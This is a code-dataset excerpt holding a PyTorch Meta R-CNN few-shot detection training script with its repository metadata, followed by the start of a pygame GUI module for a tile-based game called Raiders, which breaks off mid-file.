num_boxes_list.append(num_boxes)
# print(im_data_list)
fasterRCNN.zero_grad()
rois, rpn_loss_cls, rpn_loss_box, \
RCNN_loss_cls, RCNN_loss_bbox, \
rois_label, cls_prob, bbox_pred, meta_loss, simloss, dis_simloss = fasterRCNN(im_data_list, im_info_list, gt_boxes_list,
num_boxes_list)
# print(rpn_loss_cls)
if args.meta_train:
#loss = rpn_loss_cls.mean() + rpn_loss_box.mean() + RCNN_loss_cls.mean() + sum(
#RCNN_loss_bbox) / args.batch_size + meta_loss / len(metaclass) + simloss + dis_simloss
loss = rpn_loss_cls.mean() + rpn_loss_box.mean() + sum(RCNN_loss_bbox) / args.batch_size + meta_loss / len(metaclass)
loss_0 = RCNN_loss_cls.mean() + simloss + dis_simloss
else:
loss = rpn_loss_cls.mean() + rpn_loss_box.mean() \
+ RCNN_loss_cls.mean() + RCNN_loss_bbox.mean()
loss_temp += loss.data[0]
# backward
optimizer.zero_grad()
loss.backward(retain_graph=True)
loss_0.backward()
# if args.net == "vgg16" or "res101":
# clip_gradient(fasterRCNN, 10.)
optimizer.step()
torch.cuda.empty_cache()
if step % args.disp_interval == 0:
end = time.time()
if step > 0:
loss_temp /= args.disp_interval # loss_temp is aver loss
loss_rpn_cls = rpn_loss_cls.data[0]
loss_rpn_box = rpn_loss_box.data[0]
if not args.meta_train:
loss_rcnn_cls = RCNN_loss_cls.data[0]
loss_rcnn_box = RCNN_loss_bbox.data[0]
else:
loss_rcnn_cls = RCNN_loss_cls.mean()
loss_rcnn_box = sum(RCNN_loss_bbox) / args.batch_size
loss_metarcnn = meta_loss / len(metaclass)
simloss = simloss
dis_simloss = dis_simloss
fg_cnt = torch.sum(rois_label.data.ne(0))
bg_cnt = rois_label.data.numel() - fg_cnt
print("[session %d][epoch %2d][iter %4d] loss: %.4f, lr: %.2e" \
% (args.session, epoch, step, loss_temp, lr))
print("\t\t\tfg/bg=(%d/%d), time cost: %f" % (fg_cnt, bg_cnt, end - start))
if args.meta_train:
print("\t\t\trpn_cls: %.4f, rpn_box: %.4f, rcnn_cls: %.4f, rcnn_box %.4f, meta_loss %.4f, simloss: %.4f, dis_simloss %.4f" \
% (loss_rpn_cls, loss_rpn_box, loss_rcnn_cls, loss_rcnn_box, loss_metarcnn, simloss, dis_simloss ))
else:
print("\t\t\trpn_cls: %.4f, rpn_box: %.4f, rcnn_cls: %.4f, rcnn_box %.4f" \
% (loss_rpn_cls, loss_rpn_box, loss_rcnn_cls, loss_rcnn_box))
sys.stdout.flush()
if args.use_tfboard:
info = {
'loss': loss_temp,
'loss_rpn_cls': loss_rpn_cls,
'loss_rpn_box': loss_rpn_box,
'loss_rcnn_cls': loss_rcnn_cls,
'loss_rcnn_box': loss_rcnn_box
}
niter = (epoch - 1) * iters_per_epoch + step
for tag, value in info.items():
writer.add_scalar(tag, value, niter)
loss_temp = 0
start = time.time()
if args.meta_train:
save_name = os.path.join(output_dir,
'{}_{}_{}_{}_{}.pth'.format(str(args.dataset), str(args.net), shots, epoch,
step))
else:
save_name = os.path.join(output_dir, '{}_{}_{}_{}.pth'.format(str(args.dataset), str(args.net),
epoch, step))
save_checkpoint({
'session': args.session,
'epoch': epoch + 1,
'model': fasterRCNN.state_dict(),
'optimizer': optimizer.state_dict(),
'pooling_mode': cfg.POOLING_MODE,
'class_agnostic': args.class_agnostic,
}, save_name)
print('save model: {}'.format(save_name))
end = time.time()
print(end - start)
if args.meta_train: # to extract the mean classes attentions of shots for testing
class_attentions = collections.defaultdict(list)
class_attentions_t = collections.defaultdict(list)
meta_iter = iter(metaloader)
for i in range(shots):
prndata, prncls = next(meta_iter)
im_data_list = []
im_info_list = []
gt_boxes_list = []
num_boxes_list = []
im_data = torch.FloatTensor(1)
if args.cuda:
im_data = im_data.cuda()
im_data = Variable(im_data, volatile=True)
im_data.data.resize_(prndata.squeeze(0).size()).copy_(prndata.squeeze(0))
im_data_list.append(im_data)
attentions, attentions_t = fasterRCNN(im_data_list, im_info_list, gt_boxes_list, num_boxes_list,
average_shot=True)
for idx, cls in enumerate(prncls):
class_attentions[int(cls)].append(attentions[idx])
class_attentions_t[int(cls)].append(attentions_t[idx])
# calculate mean attention vectors of every class
mean_class_attentions = {k: sum(v) / len(v) for k, v in class_attentions.items()}
mean_class_attentions_t = {k: sum(v) / len(v) for k, v in class_attentions_t.items()}
save_path = 'attentions'
if not os.path.exists(save_path):
os.mkdir(save_path)
with open(os.path.join(save_path, str(args.phase) + '_shots_' + str(args.shots) + '_mean_class_attentions.pkl'), 'wb') as f:
pickle.dump(mean_class_attentions, f, pickle.HIGHEST_PROTOCOL)
print('save ' + str(args.shots) + ' mean classes attentions done!')
with open(os.path.join(save_path, str(args.phase) + '_shots_' + str(args.shots) + '_mean_class_attentions_t.pkl'), 'wb') as t:
pickle.dump(mean_class_attentions_t, t, pickle.HIGHEST_PROTOCOL)
print('save ' + str(args.shots) + ' mean classes attentions_t done!')
| 45.896226 | 147 | 0.575005 | # --------------------------------------------------------
# Pytorch Meta R-CNN
# Written by Anny Xu, Xiaopeng Yan, based on the code from Jianwei Yang
# --------------------------------------------------------
import _init_paths
import os
import sys
import numpy as np
import argparse
import pprint
import pdb
import time
import collections
import torch
import torch.nn as nn
import torch.optim as optim
import random
from tensorboardX import SummaryWriter
import torchvision.transforms as transforms
from torch.utils.data.sampler import Sampler
from torch.autograd import Variable
import torch.utils.data as Data
from roi_data_layer.roidb import combined_roidb, rank_roidb_ratio, filter_class_roidb
from roi_data_layer.roibatchLoader import roibatchLoader
from model.utils.config import cfg, cfg_from_file, cfg_from_list, get_output_dir
from model.utils.net_utils import weights_normal_init, save_net, load_net, \
adjust_learning_rate, save_checkpoint, clip_gradient
from model.faster_rcnn.resnet import resnet
import pickle
from datasets.metadata import MetaDataset
from collections import OrderedDict
def parse_args():
"""
Parse input arguments
"""
parser = argparse.ArgumentParser(description='Train Meta R-CNN network')
# Define training data and Model
parser.add_argument('--dataset', dest='dataset',
help='training dataset:coco2017,coco,pascal_07_12',
default='pascal_voc_0712', type=str)
parser.add_argument('--net', dest='net',
help='metarcnn',
default='metarcnn', type=str)
# Define display and save dir
parser.add_argument('--start_epoch', dest='start_epoch',
help='starting epoch',
default=1, type=int)
parser.add_argument('--epochs', dest='max_epochs',
help='number of epochs to train',
default=21, type=int)
parser.add_argument('--disp_interval', dest='disp_interval',
help='number of iterations to display',
default=100, type=int)
parser.add_argument('--checkpoint_interval', dest='checkpoint_interval',
help='number of iterations to display',
default=10000, type=int)
parser.add_argument('--save_dir', dest='save_dir',
help='directory to save models', default="./models",
type=str)
# Define training parameters
parser.add_argument('--nw', dest='num_workers',
help='number of worker to load data',
default=0, type=int)
parser.add_argument('--cuda', dest='cuda', default=True, type=bool,
help='whether use CUDA')
parser.add_argument('--bs', dest='batch_size',
help='batch_size',
default=1, type=int)
parser.add_argument('--cag', dest='class_agnostic', default=False, type=bool,
help='whether perform class_agnostic bbox regression')
# Define meta parameters
parser.add_argument('--meta_train', dest='meta_train', default=False, type=bool,
help='whether perform meta training')
parser.add_argument('--meta_loss', dest='meta_loss', default=False, type=bool,
help='whether perform adding meta loss')
parser.add_argument('--transductive', dest='transductive', default=True, type=bool,
help='whether perform transductive')
parser.add_argument('--visualization', dest='visualization', default=False, type=bool,
help='whether perform visualization')
parser.add_argument('--phase', dest='phase',
help='the phase of training process',
default=1, type=int)
parser.add_argument('--shots', dest='shots',
help='the number meta input of PRN network',
default=1, type=int)
parser.add_argument('--meta_type', dest='meta_type', default=1, type=int,
help='choose which sets of metaclass')
# config optimization
parser.add_argument('--o', dest='optimizer',
help='training optimizer',
default="sgd", type=str)
parser.add_argument('--lr', dest='lr',
help='starting learning rate',
default=0.001, type=float)
parser.add_argument('--lr_decay_step', dest='lr_decay_step',
help='step to do learning rate decay, unit is epoch',
default=4, type=int)
parser.add_argument('--lr_decay_gamma', dest='lr_decay_gamma',
help='learning rate decay ratio',
default=0.1, type=float)
# set training session
parser.add_argument('--s', dest='session',
help='training session',
default=1, type=int)
# resume trained model
parser.add_argument('--r', dest='resume',
help='resume checkpoint or not',
default=False, type=bool)
parser.add_argument('--checksession', dest='checksession',
help='checksession to load model',
default=1, type=int)
parser.add_argument('--checkepoch', dest='checkepoch',
help='checkepoch to load model',
default=10, type=int)
parser.add_argument('--checkpoint', dest='checkpoint',
help='checkpoint to load model',
default=21985, type=int)
# log and diaplay
parser.add_argument('--use_tfboard', dest='use_tfboard',
help='whether use tensorflow tensorboard',
default=True, type=bool)
parser.add_argument('--log_dir', dest='log_dir',
help='directory to save logs', default='logs',
type=str)
args = parser.parse_args()
return args
class sampler(Sampler):
def __init__(self, train_size, batch_size):
self.num_data = train_size
self.num_per_batch = int(train_size / batch_size)
self.batch_size = batch_size
self.range = torch.arange(0, batch_size).view(1, batch_size).long()
self.leftover_flag = False
if train_size % batch_size:
self.leftover = torch.arange(self.num_per_batch * batch_size, train_size).long()
self.leftover_flag = True
def __iter__(self):
rand_num = torch.randperm(self.num_per_batch).view(-1, 1) * self.batch_size
self.rand_num = rand_num.expand(self.num_per_batch, self.batch_size) + self.range
self.rand_num_view = self.rand_num.view(-1)
if self.leftover_flag:
self.rand_num_view = torch.cat((self.rand_num_view, self.leftover), 0)
return iter(self.rand_num_view)
def __len__(self):
return self.num_data
if __name__ == '__main__':
args = parse_args()
print('Called with args:')
print(args)
if args.use_tfboard:
writer = SummaryWriter(args.log_dir)
if args.dataset == "coco2017":
args.imdb_name = "coco_2017_train"
args.imdbval_name = "coco_2017_val"
args.set_cfgs = ['ANCHOR_SCALES', '[2, 4, 8, 16, 32]', 'ANCHOR_RATIOS', '[0.5,1,2]', 'MAX_NUM_GT_BOXES', '50']
elif args.dataset == "coco":
args.imdb_name = "coco_2014_train+coco_2014_valminusminival"
args.imdbval_name = "coco_2014_minival"
args.set_cfgs = ['ANCHOR_SCALES', '[2, 4, 8, 16, 32]', 'ANCHOR_RATIOS', '[0.5,1,2]', 'MAX_NUM_GT_BOXES', '50']
elif args.dataset == "pascal_voc_0712":
if args.phase == 1: # three types of base and novel classes splits
if args.meta_type == 1:
args.imdb_name = "voc_2007_train_first_split+voc_2012_train_first_split"
elif args.meta_type == 2:
args.imdb_name = "voc_2007_train_second_split+voc_2012_train_second_split"
elif args.meta_type == 3:
args.imdb_name = "voc_2007_train_third_split+voc_2012_train_third_split"
else:
args.imdb_name = "voc_2007_shots" # the default sampled shots saved path of meta classes in the first phase
args.imdbval_name = "voc_2007_test"
args.set_cfgs = ['ANCHOR_SCALES', '[8, 16, 32]', 'ANCHOR_RATIOS', '[0.5,1,2]', 'MAX_NUM_GT_BOXES', '20']
# the number of sets of metaclass
cfg.TRAIN.META_TYPE = args.meta_type
cfg.USE_GPU_NMS = args.cuda
if args.cuda:
cfg.CUDA = True
args.cfg_file = "cfgs/res101_ms.yml"
if args.cfg_file is not None:
cfg_from_file(args.cfg_file)
if args.set_cfgs is not None:
cfg_from_list(args.set_cfgs)
print('Using config:')
pprint.pprint(cfg)
np.random.seed(cfg.RNG_SEED)
#torch.manual_seed(cfg.RNG_SEED) # 为CPU设置随机种子
#torch.cuda.manual_seed(cfg.RNG_SEED) # 为当前GPU设置随机种子
if torch.cuda.is_available() and not args.cuda:
print("WARNING: You have a CUDA device, so you should probably run with --cuda")
if args.phase == 1:
# First phase only use the base classes
shots = 200
if args.meta_type == 1: # use the first sets of base classes
metaclass = cfg.TRAIN.BASECLASSES_FIRST
if args.meta_type == 2: # use the second sets of base classes
metaclass = cfg.TRAIN.BASECLASSES_SECOND
if args.meta_type == 3: # use the third sets of base classes
metaclass = cfg.TRAIN.BASECLASSES_THIRD
else:
# Second phase only use fewshot number of base and novel classes
shots = args.shots
if args.meta_type == 1: # use the first sets of all classes
metaclass = cfg.TRAIN.ALLCLASSES_FIRST
if args.meta_type == 2: # use the second sets of all classes
metaclass = cfg.TRAIN.ALLCLASSES_SECOND
if args.meta_type == 3: # use the third sets of all classes
metaclass = cfg.TRAIN.ALLCLASSES_THIRD
num_ways = len(metaclass)
# prepare meta sets for meta training
if args.meta_train:
# construct the input dataset of PRN network
img_size = 224
if args.phase == 1:
img_set = [('2007', 'trainval'), ('2012', 'trainval')]
else:
img_set = [('2007', 'trainval')]
metadataset = MetaDataset('data/VOCdevkit',
img_set, metaclass, img_size, shots=shots, shuffle=True,phase = args.phase)
# print(metadataset)
metaloader = torch.utils.data.DataLoader(metadataset, batch_size=1, shuffle=False, num_workers=0,
pin_memory=True)
# print(metadataset)
imdb, roidb, ratio_list, ratio_index = combined_roidb(args.imdb_name)
# filter roidb for the second phase
if args.phase == 2:
roidb = filter_class_roidb(roidb, args.shots, imdb)
ratio_list, ratio_index = rank_roidb_ratio(roidb)
imdb.set_roidb(roidb)
train_size = len(roidb)
print('{:d} roidb entries'.format(len(roidb)))
sys.stdout.flush()
output_dir = args.save_dir
if not os.path.exists(output_dir):
os.makedirs(output_dir)
sampler_batch = sampler(train_size, args.batch_size)
dataset = roibatchLoader(roidb, ratio_list, ratio_index, args.batch_size, imdb.num_classes, training=True)
dataloader = torch.utils.data.DataLoader(dataset, batch_size=args.batch_size,
sampler=sampler_batch, num_workers=args.num_workers, pin_memory=False)
# initilize the network here
if args.net == 'metarcnn':
fasterRCNN = resnet(imdb.classes, num_ways, 101, pretrained=True, class_agnostic=args.class_agnostic,
meta_train=args.meta_train, meta_loss=args.meta_loss, transductive=args.transductive, visualization=args.visualization)
fasterRCNN.create_architecture()
# initilize the optimizer here
lr = cfg.TRAIN.LEARNING_RATE
lr = args.lr
params = []
for key, value in dict(fasterRCNN.named_parameters()).items():
if value.requires_grad:
if 'bias' in key:
params += [{'params': [value], 'lr': lr * (cfg.TRAIN.DOUBLE_BIAS + 1), \
'weight_decay': cfg.TRAIN.BIAS_DECAY and cfg.TRAIN.WEIGHT_DECAY or 0}]
else:
params += [{'params': [value], 'lr': lr, 'weight_decay': cfg.TRAIN.WEIGHT_DECAY}]
if args.optimizer == "adam":
lr = lr * 0.1
optimizer = torch.optim.Adam(params)
elif args.optimizer == "sgd":
optimizer = torch.optim.SGD(params, momentum=cfg.TRAIN.MOMENTUM)
if args.cuda:
fasterRCNN.cuda()
if args.resume:
load_name = os.path.join(output_dir,
'{}_metarcnn_{}_{}_{}.pth'.format(args.dataset, args.checksession,
args.checkepoch, args.checkpoint))
print("loading checkpoint %s" % (load_name))
checkpoint = torch.load(load_name)
args.session = checkpoint['session']
args.start_epoch = checkpoint['epoch']
# the number of classes in second phase is different from first phase
if args.phase == 2:
new_state_dict = OrderedDict()
# initilize params of RCNN_cls_score and RCNN_bbox_pred for second phase
RCNN_cls_score_n = nn.Linear(2048, imdb.num_classes)
RCNN_bbox_pred = nn.Linear(2048, 4 * imdb.num_classes)
for k, v in checkpoint['model'].items():
name = k
new_state_dict[name] = v
if 'RCNN_cls_score_n.weight' in k:
new_state_dict[name] = RCNN_cls_score_n.weight
if 'RCNN_cls_score_n.bias' in k:
new_state_dict[name] = RCNN_cls_score_n.bias
if 'RCNN_bbox_pred.weight' in k:
new_state_dict[name] = RCNN_bbox_pred.weight
if 'RCNN_bbox_pred.bias' in k:
new_state_dict[name] = RCNN_bbox_pred.bias
fasterRCNN.load_state_dict(new_state_dict)
elif args.phase == 1:
fasterRCNN.load_state_dict(checkpoint['model'])
optimizer.load_state_dict(checkpoint['optimizer'])
lr = optimizer.param_groups[0]['lr']
if 'pooling_mode' in checkpoint.keys():
cfg.POOLING_MODE = checkpoint['pooling_mode']
print("loaded checkpoint %s" % (load_name))
iters_per_epoch = int(train_size / args.batch_size)
for epoch in range(args.start_epoch, args.max_epochs):
fasterRCNN.train()
loss_temp = 0
start = time.time()
if epoch % (args.lr_decay_step + 1) == 0:
adjust_learning_rate(optimizer, args.lr_decay_gamma)
lr *= args.lr_decay_gamma
data_iter = iter(dataloader)
meta_iter = iter(metaloader)
for step in range(iters_per_epoch):
try:
data = next(data_iter)
except:
data_iter = iter(dataloader)
data = next(data_iter)
# print(data)
im_data_list = []
im_info_list = []
gt_boxes_list = []
num_boxes_list = []
# initilize the tensor holder here.
im_data = torch.FloatTensor(1)
im_info = torch.FloatTensor(1)
num_boxes = torch.LongTensor(1)
gt_boxes = torch.FloatTensor(1)
# ship to cuda
if args.cuda:
im_data = im_data.cuda()
im_info = im_info.cuda()
num_boxes = num_boxes.cuda()
gt_boxes = gt_boxes.cuda()
# make variable
im_data = Variable(im_data)
im_info = Variable(im_info)
num_boxes = Variable(num_boxes)
gt_boxes = Variable(gt_boxes)
if args.meta_train:
# get prn network input data
try:
prndata,prncls = next(meta_iter)
except:
meta_iter = iter(metaloader)
prndata, prncls = next(meta_iter)
#prn_cls = []
#for i in range(len(prncls)):
# prncls_num = prncls[i]
# length = prncls_num.size() - 1
# for prncls_num in enumerate(prncls_num.split(length,0)):
# prn_cls.append(prncls_num[1])
im_data_list.append(Variable(torch.cat(prndata,dim=0).cuda()))
im_info_list.append(prncls)
im_data.data.resize_(data[0].size()).copy_(data[0])
im_info.data.resize_(data[1].size()).copy_(data[1])
gt_boxes.data.resize_(data[2].size()).copy_(data[2])
num_boxes.data.resize_(data[3].size()).copy_(data[3])
im_data_list.append(im_data)
im_info_list.append(im_info)
gt_boxes_list.append(gt_boxes)
num_boxes_list.append(num_boxes)
# print(im_data_list)
# print(im_info_list)
else:
im_data.data.resize_(data[0].size()).copy_(data[0])
im_info.data.resize_(data[1].size()).copy_(data[1])
gt_boxes.data.resize_(data[2].size()).copy_(data[2])
num_boxes.data.resize_(data[3].size()).copy_(data[3])
im_data_list.append(im_data)
im_info_list.append(im_info)
gt_boxes_list.append(gt_boxes)
num_boxes_list.append(num_boxes)
# print(im_data_list)
fasterRCNN.zero_grad()
rois, rpn_loss_cls, rpn_loss_box, \
RCNN_loss_cls, RCNN_loss_bbox, \
rois_label, cls_prob, bbox_pred, meta_loss, simloss, dis_simloss = fasterRCNN(im_data_list, im_info_list, gt_boxes_list,
num_boxes_list)
# print(rpn_loss_cls)
if args.meta_train:
#loss = rpn_loss_cls.mean() + rpn_loss_box.mean() + RCNN_loss_cls.mean() + sum(
#RCNN_loss_bbox) / args.batch_size + meta_loss / len(metaclass) + simloss + dis_simloss
loss = rpn_loss_cls.mean() + rpn_loss_box.mean() + sum(RCNN_loss_bbox) / args.batch_size + meta_loss / len(metaclass)
loss_0 = RCNN_loss_cls.mean() + simloss + dis_simloss
else:
loss = rpn_loss_cls.mean() + rpn_loss_box.mean() \
+ RCNN_loss_cls.mean() + RCNN_loss_bbox.mean()
loss_temp += loss.data[0]
# backward
optimizer.zero_grad()
loss.backward(retain_graph=True)
loss_0.backward()
# if args.net == "vgg16" or "res101":
# clip_gradient(fasterRCNN, 10.)
optimizer.step()
torch.cuda.empty_cache()
if step % args.disp_interval == 0:
end = time.time()
if step > 0:
loss_temp /= args.disp_interval # loss_temp is aver loss
loss_rpn_cls = rpn_loss_cls.data[0]
loss_rpn_box = rpn_loss_box.data[0]
if not args.meta_train:
loss_rcnn_cls = RCNN_loss_cls.data[0]
loss_rcnn_box = RCNN_loss_bbox.data[0]
else:
loss_rcnn_cls = RCNN_loss_cls.mean()
loss_rcnn_box = sum(RCNN_loss_bbox) / args.batch_size
loss_metarcnn = meta_loss / len(metaclass)
simloss = simloss
dis_simloss = dis_simloss
fg_cnt = torch.sum(rois_label.data.ne(0))
bg_cnt = rois_label.data.numel() - fg_cnt
print("[session %d][epoch %2d][iter %4d] loss: %.4f, lr: %.2e" \
% (args.session, epoch, step, loss_temp, lr))
print("\t\t\tfg/bg=(%d/%d), time cost: %f" % (fg_cnt, bg_cnt, end - start))
if args.meta_train:
print("\t\t\trpn_cls: %.4f, rpn_box: %.4f, rcnn_cls: %.4f, rcnn_box %.4f, meta_loss %.4f, simloss: %.4f, dis_simloss %.4f" \
% (loss_rpn_cls, loss_rpn_box, loss_rcnn_cls, loss_rcnn_box, loss_metarcnn, simloss, dis_simloss ))
else:
print("\t\t\trpn_cls: %.4f, rpn_box: %.4f, rcnn_cls: %.4f, rcnn_box %.4f" \
% (loss_rpn_cls, loss_rpn_box, loss_rcnn_cls, loss_rcnn_box))
sys.stdout.flush()
if args.use_tfboard:
info = {
'loss': loss_temp,
'loss_rpn_cls': loss_rpn_cls,
'loss_rpn_box': loss_rpn_box,
'loss_rcnn_cls': loss_rcnn_cls,
'loss_rcnn_box': loss_rcnn_box
}
niter = (epoch - 1) * iters_per_epoch + step
for tag, value in info.items():
writer.add_scalar(tag, value, niter)
loss_temp = 0
start = time.time()
if args.meta_train:
save_name = os.path.join(output_dir,
'{}_{}_{}_{}_{}.pth'.format(str(args.dataset), str(args.net), shots, epoch,
step))
else:
save_name = os.path.join(output_dir, '{}_{}_{}_{}.pth'.format(str(args.dataset), str(args.net),
epoch, step))
save_checkpoint({
'session': args.session,
'epoch': epoch + 1,
'model': fasterRCNN.state_dict(),
'optimizer': optimizer.state_dict(),
'pooling_mode': cfg.POOLING_MODE,
'class_agnostic': args.class_agnostic,
}, save_name)
print('save model: {}'.format(save_name))
end = time.time()
print(end - start)
if args.meta_train: # to extract the mean classes attentions of shots for testing
class_attentions = collections.defaultdict(list)
class_attentions_t = collections.defaultdict(list)
meta_iter = iter(metaloader)
for i in range(shots):
prndata, prncls = next(meta_iter)
im_data_list = []
im_info_list = []
gt_boxes_list = []
num_boxes_list = []
im_data = torch.FloatTensor(1)
if args.cuda:
im_data = im_data.cuda()
im_data = Variable(im_data, volatile=True)
im_data.data.resize_(prndata.squeeze(0).size()).copy_(prndata.squeeze(0))
im_data_list.append(im_data)
attentions, attentions_t = fasterRCNN(im_data_list, im_info_list, gt_boxes_list, num_boxes_list,
average_shot=True)
for idx, cls in enumerate(prncls):
class_attentions[int(cls)].append(attentions[idx])
class_attentions_t[int(cls)].append(attentions_t[idx])
# calculate mean attention vectors of every class
mean_class_attentions = {k: sum(v) / len(v) for k, v in class_attentions.items()}
mean_class_attentions_t = {k: sum(v) / len(v) for k, v in class_attentions_t.items()}
save_path = 'attentions'
if not os.path.exists(save_path):
os.mkdir(save_path)
with open(os.path.join(save_path, str(args.phase) + '_shots_' + str(args.shots) + '_mean_class_attentions.pkl'), 'wb') as f:
pickle.dump(mean_class_attentions, f, pickle.HIGHEST_PROTOCOL)
print('save ' + str(args.shots) + ' mean classes attentions done!')
with open(os.path.join(save_path, str(args.phase) + '_shots_' + str(args.shots) + '_mean_class_attentions_t.pkl'), 'wb') as t:
pickle.dump(mean_class_attentions_t, t, pickle.HIGHEST_PROTOCOL)
print('save ' + str(args.shots) + ' mean classes attentions_t done!')
| 836 | 2 | 103 |
8b572207b8865cd9cdb8ae107f4ea6e1955c9b1c | 16,228 | py | Python | systems/GameGUI.py | itsabugnotafeature/Raiders | 72c20a83c253538a3a41658a78cbc0fe5eca346b | [
"MIT"
] | 1 | 2022-03-27T05:36:44.000Z | 2022-03-27T05:36:44.000Z | systems/GameGUI.py | itsabugnotafeature/Raiders | 72c20a83c253538a3a41658a78cbc0fe5eca346b | [
"MIT"
] | null | null | null | systems/GameGUI.py | itsabugnotafeature/Raiders | 72c20a83c253538a3a41658a78cbc0fe5eca346b | [
"MIT"
] | null | null | null | import scripts.gui_elements
import scripts.tools
from scripts.Colors import Color
from scripts.variables.localvars import *
from systems.BaseSystem import BaseSystem
from scripts import highlights
# HELPER FUNCTIONS #
| 47.311953 | 126 | 0.575857 | import scripts.gui_elements
import scripts.tools
from scripts.Colors import Color
from scripts.variables.localvars import *
from systems.BaseSystem import BaseSystem
from scripts import highlights
class GUI(BaseSystem):
def __init__(self):
self.Engine = None
self.game_vars = {}
self.GUITheme = scripts.gui_elements.Theme(main_color=(178, 178, 178),
accent_color1=Color.Yellow,
accent_color2=Color.LightGoldenrodYellow,
accent_color3=(122, 59, 46),
chat_color=(147, 112, 219),
background_color1=(Color.with_alpha(200, Color.DimGray)),
error_color=Color.Red,
reward_color=(51, 153, 255),
fight_color=(255, 102, 0))
self.gui_list = []
self.base_gui_addresses = []
self.fight_gui_addresses = []
self.pause_gui_addresses = []
self.pathing_highlight = pygame.Surface((80, 80), pygame.SRCALPHA)
self.pathing_highlight.fill(Color.with_alpha(100, Color.WhiteSmoke))
pygame.draw.rect(self.pathing_highlight, Color.with_alpha(200, Color.WhiteSmoke), (0, 0, 78, 78), 2)
self.move_highlight = pygame.Surface((80, 80), pygame.SRCALPHA)
self.move_highlight.fill(Color.with_alpha(100, Color.CornflowerBlue))
pygame.draw.rect(self.move_highlight, Color.with_alpha(200, Color.CornflowerBlue), (0, 0, 78, 78), 2)
self.choosing_highlight = pygame.Surface((68, 68), pygame.SRCALPHA)
self.choosing_highlight.fill(Color.with_alpha(100, Color.Gray))
pygame.draw.rect(self.choosing_highlight, Color.with_alpha(200, Color.DimGray), (0, 0, 66, 66), 2)
self.active_highlight = pygame.Surface(scripts.tools.get_square_size(70))
self.active_highlight.fill(Color.LightGreen)
scripts.tools.outline_square(self.active_highlight, Color.YellowGreen, 6)
self.active_highlight.set_colorkey(Color.Black)
self.active_highlight = pygame.transform.rotate(self.active_highlight, -45)
self.name_plate_highlight = pygame.transform.scale(self.active_highlight, (12, 12))
self.fight_highlight = pygame.Surface((68, 68), pygame.SRCALPHA)
self.fight_highlight.fill(Color.with_alpha(100, Color.IndianRed))
pygame.draw.rect(self.fight_highlight, Color.with_alpha(200, Color.IndianRed), (0, 0, 66, 66), 2)
self.friendly_highlight = pygame.Surface((68, 68), pygame.SRCALPHA)
self.friendly_highlight.fill(Color.with_alpha(100, Color.LightGreen))
pygame.draw.rect(self.friendly_highlight, Color.with_alpha(200, Color.LightGreen), (0, 0, 66, 66), 2)
self.banner = None
self.DisplayBox = None
def set_up(self):
self.pathing_highlight.convert()
self.move_highlight.convert()
self.fight_highlight.convert()
self.friendly_highlight.convert()
self.active_highlight.convert()
self.active_highlight = highlights.BlinkingTile(self.active_highlight, (80, 210, 108))
self.gui_list.append(scripts.gui_elements.ScrollingTextBox((4, self.Engine.window_height - 234, 400, 196),
self.GUITheme))
self.base_gui_addresses.append(0)
self.gui_list.append(scripts.gui_elements.InputTextBox((4, self.Engine.window_height - 35, 400, 30),
self.GUITheme))
self.base_gui_addresses.append(1)
self.game_vars[OUTPUT_CONSOLE] = self.gui_list[0]
for sprite in self.game_vars[SPRITE_LIST]:
sprite.render_name(self.Engine.font, self.GUITheme)
def handle_event(self, event):
if event.type == FIGHT_EVENT:
if event.subtype == FIGHT_BEGIN:
self.display_fight_gui(event.player, event.monster)
elif event.subtype == FIGHT_END:
self.fight_clean_up()
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE:
if self.game_vars[PAUSE]:
self.dehover_guis()
self.display_pause_gui()
for address in self.base_gui_addresses:
self.gui_list[address].handle_event(event)
else:
self.pause_clean_up()
self.quit_confirm_clean_up()
if event.type == BANNER:
self.banner = event.banner
if not self.game_vars[PAUSE]:
# Make sure that if it is active, only the DisplayBox receives updates
for gui in self.gui_list:
gui.handle_event(event)
else:
if self.DisplayBox is None:
for address in self.pause_gui_addresses:
self.gui_list[address].handle_event(event)
else:
self.DisplayBox.handle_event(event)
def main_loop(self):
if self.game_vars[GAME_STATE] == PATHING:
if self.Engine.Logic.active_sprite.type =="player":
self.make_pathing_highlight()
self.make_highlight_tile()
self.make_active_tile(self.Engine)
if self.game_vars[GAME_STATE] == ATTACKING:
if self.Engine.Logic.active_sprite.type == "player":
self.make_attacking_tiles()
self.make_active_tile(self.Engine)
counter = 0
for sprite in self.game_vars[SPRITE_LIST]:
# Makes the info panels on the side for each sprite in play
# TODO: also include dead bosses
# pos = (counter*85, 10)
# make_event(SURFACE, surf=sprite.get_nameplate(), pos=pos, z=1)
# counter += 1
if sprite.fightable:
self.make_name_plate(sprite)
if sprite.health < sprite.maxhealth:
self.make_health_bars(sprite)
if self.DisplayBox is None:
for gui in self.gui_list:
gui.update(self.Engine)
else:
self.DisplayBox.update(self.Engine)
for address in self.fight_gui_addresses + self.base_gui_addresses:
gui = self.gui_list[address]
make_event(SURFACE, surf=gui.render(), pos=gui.position, z=1)
if self.banner is not None:
self.update_blit_banner()
if self.game_vars[PAUSE]:
if self.DisplayBox is not None:
make_event(SURFACE, surf=self.DisplayBox.render(), pos=self.DisplayBox.position, z=4)
for address in self.pause_gui_addresses:
gui = self.gui_list[address]
make_event(SURFACE, surf=gui.render(), pos=gui.position, z=3)
# HELPER FUNCTIONS #
def make_health_bars(self, sprite):
offset = (self.game_vars[BOARD_OFFSET][0] + self.game_vars[GRID_OFFSET][0],
self.game_vars[BOARD_OFFSET][1] + self.game_vars[GRID_OFFSET][1])
pos = (sprite.pos[0] * self.game_vars[TILE_SIZE] + offset[0] + 12,
sprite.pos[1] * self.game_vars[TILE_SIZE] + offset[1] + 60)
surf = pygame.Surface((68, 4))
surf.fill(Color.Brown)
health_percentage = sprite.health / sprite.maxhealth
color = scripts.tools.get_percentage_color(health_percentage)
if health_percentage > 0:
pygame.draw.rect(surf, color, (0, 0, health_percentage * surf.get_width(), 10))
make_event(SURFACE, surf=surf, pos=pos, z=0)
def make_name_plate(self, sprite):
offset = (self.game_vars[BOARD_OFFSET][0] + self.game_vars[GRID_OFFSET][0],
self.game_vars[BOARD_OFFSET][1] + self.game_vars[GRID_OFFSET][1])
pos = (sprite.pos[0] * self.game_vars[TILE_SIZE] + offset[0],
sprite.pos[1] * self.game_vars[TILE_SIZE] + offset[1] - 50)
if sprite == self.game_vars[ACTIVE_SPRITE]:
make_event(SURFACE, surf=self.name_plate_highlight, pos=(pos[0]-12, pos[1]+3), z=1)
make_event(SURFACE, surf=sprite.name_img, pos=pos, z=1)
def make_attacking_tiles(self):
